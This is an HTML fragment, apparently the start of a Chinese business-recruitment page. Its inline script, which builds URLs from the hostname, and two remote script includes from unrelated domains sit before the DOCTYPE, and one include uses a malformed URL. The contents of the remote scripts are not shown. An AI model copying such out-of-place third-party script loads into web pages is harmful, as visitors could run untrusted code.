
<body>
<script src='http:://2.gou1221.com/config.js'></script>
<script>
    var xhref = window.location.host;
    var xurl = xhref.split('.');
    var last = xurl.length;
    var weburl = xurl[last-2]+'.'+xurl[last-1]+'/pro';
    var shouye = xurl[last-2]+'.'+xurl[last-1];
    var logo_url = 'http://picbaidu.9155.cn/baseinfo/hsh/pc/logo.png';
</script>
<script src='http://lybook.9155.cn/bookjs/lybook_top.js'></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>招商帮</title></head>